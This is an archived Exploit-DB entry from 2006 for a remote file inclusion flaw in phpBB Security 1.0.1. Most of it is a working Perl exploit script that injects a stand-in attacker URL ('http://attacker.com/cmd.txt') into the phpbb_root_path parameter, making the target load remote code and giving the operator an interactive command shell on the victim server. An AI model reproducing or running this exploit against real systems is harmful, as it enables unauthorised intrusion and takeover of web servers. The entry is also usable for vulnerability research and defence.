phpBB Security <= 1.0.1 php_security.php Remote File Include Exploit

2006-10-13T00:00:00
ID EDB-ID:2552
Type exploitdb
Reporter Nima Salehi
Modified 2006-10-13T00:00:00

Description

phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
 
#####################################################################################################
#                                                                                                   #
# phpBB Security  1.0.1                                                                             #
#                                                                                                   #
# Class:  Remote File Include Vulnerability                                                         #
# Date:   2006/10/12                                                                                #
#                                                                                                   #
# Remote: Yes                                                                                       #
#                                                                                                   #
# Type:   high                                                                                      #
#                                                                                                   #
# Site:   http://www.phpbb-amod.com/downloads/phpBB_Security.zip                                    #
#                                                                                                   #
#####################################################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # &lt;====== Change This Line With Your Personal Script

print "\n";
print "##########################################################################\n";
print "#                                                                        #\n";
print "# phpBB Security  &lt;= 1.0.1           Remote File Include Vulnerability   #\n";
print "# Bug found By : Ashiyane Corporation                                    #\n";
print "# Email: nima salehi    nima[at]ashiyane.ir                              #\n";
print "# Web Site : www.Ashiyane.ir                                             #\n";
print "#                                                                        #\n";
print "##########################################################################\n";


if (@ARGV &lt; 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
    print "\n EX : Ashiyane.pl www.victim.com /path/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path="

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "&lt;Shell&gt; ";$cmd = &lt;STDIN&gt;;

while($cmd !~ "END") {
    $socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = &lt;$socket&gt;)
    {
        print $raspuns;
    }

    print "&lt;Shell&gt; ";
    $cmd = &lt;STDIN&gt;;
}

# milw0rm.com [2006-10-13]